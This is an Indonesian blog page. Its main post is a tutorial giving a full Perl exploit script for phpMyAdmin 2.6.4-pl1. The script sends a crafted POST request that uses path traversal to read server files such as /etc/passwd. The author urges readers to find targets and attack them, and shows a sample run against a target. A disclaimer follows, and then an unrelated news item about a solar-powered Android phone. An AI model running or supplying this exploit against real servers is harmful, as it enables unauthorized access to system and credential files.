Kamis, 03 Maret 2011

Cara Membuka Akses Keseluruhan dari Database

Phpmyadmin biasa nya tempat kita membuka akses keseluruhan dari database dan tempat kita membuat,menghapus dan memanipulasi data jadi phpmyadmin adalah tempat yang sangat rahasia bagi sang admin nah apa jadi nya kalo tempat yang sangat sakral itu bisa di buka ??? wah... gawat donk...
PERINGATAN ADMIN : PATCH YOUR SERVER NOW!!!
so apa lagi.... Lets rock and roll, sebelum kita melangkah lebih jauh mari kita analisis di mana lubang untuk kita susupi ke dalam sistem 
  1. Direktory phpmyadmin biasa nya ada di http://www.target.com/phpmyadmin/ nah apabila direktory itu tidak di proteksi maka gawat donk jadi biasa nya tempat itu pasti di password... nah loh gimana kita masuknya??? jangan panik.... lanjut saja
  2. File vulnerable yang bisa kita intip maka berdasarkan hal di atas ( duh kek lagi kuliah aja yah formal banget ) , mari kita membuat exploit sederhana
[dokter@localhost exploit]$ cat > phpmyadmin.pl
#!/usr/bin/perl
use IO::Socket;
# dokter^cinta
# bruteforce team @dalnet
#
# exploit phpMyAdmin 2.6.4-pl1
#
#
# Greatz to all my friends
# thanks for your idea to make this exploit
#
# Contact : dokter.cinta[at]gmail.com
# Website : http://Forum.doktercinta.org
#
if (@ARGV < 3)
{
print "\r\n Modified By: Dokter^cinta @ dalnet\r\n";
print "EXpl01T phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "perl phpmyadmin.pl target /DIR/ FILE\r\n\r\n";
print "target - target dimana ada phpmyadmin contoh: http://localhost\r\n";
print "DIR - Direktori untuk PMA contoh: /phpMyAdmin- 2.6.4-pl1/\r\n";
print "FILE - file untuk di intip ../../../../../etc/passwd\r\n\r\n";
print "contoh cmd: perl phpmyadmin.pl http://localhost /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd\r\n\r\n";
print "\r\n Bruteforce Team @dalnet\r\n";
exit();
}
$HOST = $ARGV[0];
$DIR = $ARGV[1]."libraries/grab_globals.lib.php";
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".
$ARGV[2].
"&subform[1][cXIb8O3]=1";
$LENGTH = length $FILE;
print "\r\ntarget adalah: ".$HOST."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST",
PeerPort => "80") || die "Error 404\r\n\r\n";
print $get1 "POST ".$DIR." HTTP/1.0\n";
print $get1 "Host: ".%HOST."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n";
print $get1 $FILE;
while ($odp = <$get1>)
{
if ($odp =~ /Warning<\/b>: main\(\): akses ditolak hikz hikz hikz .\/$ARGV[2]
in
/ ) {
printf "\n\nFile ".$ARGV[2]." tak ada om :( .\r\n\r\n";
exit;
}
printf $odp;
}
maka kita cari target yang pake phpmyadmin lalu apa lagi....??? yah serang !!!!!!!!!!!!!!!!!!!
[dokter@localhost exploit]$ perl phpmyadmin.pl www.target.com /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd
target adalah : www.target.com dan good luck you got their database
:P
===========================================================
WARNING !!!
saya tidak bertanggung jawab atas penyalah gunaan dari artikel ini dan ini hanya sebagai ilmu pengetahuan belaka jadi sekali lagi ...
PLEASE DONT TRY THIS AT OTHER PEOPLE PCS
TRY THIS WITH YOUR OWN RISK

Tekhnologi Terbaru 2011, China Bikin Ponsel Android Tenaga Surya


Umeox Apollo pertama muncul di Mobile World Congress (MWC) Barcelona. Ponsel itu memanfaatkan solusi sumber energi surya Intivation, perusahaan Amsterdam yang memberi solusi sumber energi alternatif ponsel.

Umeox Apollo merupakan smartphone pertama yang menggunakan sistem operasi (OS) Android Froyo (2.2). Seperti dikutip TG Daily, smartphone berlayar sentuh itu juga didukung memori flash 1GB, RAM 512 MB dan kamera 3 megapiksel yang akan menjadi senajat Umeox Apollo untuk bersaing.


Fitur-fitur itu memang terbilang biasa,satu-satunya hal menarik adalah keunikannya pada pengisian ulang baterai menggunakan energi matahari. Untuk saat ini, Umeox Apollo baru didistribusikan China.

Negara-negara lain akan segera menyusul, salah satunya Amerika Serikat (AS). Harga ponsel ini pun tergolong murah, yakni US$ 100 (Rp 882 ribu).